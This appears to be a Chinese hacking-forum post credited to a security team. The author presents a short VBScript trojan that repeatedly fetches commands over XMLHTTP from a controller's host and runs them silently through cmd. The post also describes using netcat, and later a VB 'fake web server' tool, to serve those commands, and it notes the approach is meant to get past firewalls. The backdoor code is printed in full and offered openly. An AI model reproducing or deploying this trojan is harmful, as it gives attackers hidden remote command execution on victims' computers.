文章作者:千寂孤城
信息来源:邪恶八进制信息安全团队
用VB写的一个小程序,自己感觉很有趣。
这个程序是用MSWINSOCK把自己的机子伪装成一台WEB服务器。
本来写这个程序是为了配合前些天写的一个XMLHTTP脚本木马:
复制内容到剪贴板
代码:
On Error Resume Next
Set Http=CreateObject("Microsoft.XMLHTTP")
Set Shell=CreateObject("Wscript.Shell")
Do
ip=MyIP
Http.Open "Get","http://"&ip,False
Http.Send
a=Http.ResponseText
Shell.Run "cmd /c "&a,0
Wscript.Sleep 1000
Loop之所以写这个小马是因为XMLHTTP控件自windows98以来就一直是系统默认自带的控件,并且被系统认为是安全的,所以我想可以从一定程度上穿越防火墙。刚开始我是用nc把自己伪装成web服务器来欺骗浏览器的(nc -vv -L -p 80<a.txt,a.txt里就是一些头信息和cmd),后来发现nc麻烦了点就写了这个“挂静态网页机”
但是后来发现这个小马作用不大,反倒是“挂静态网页机”比较好玩。:)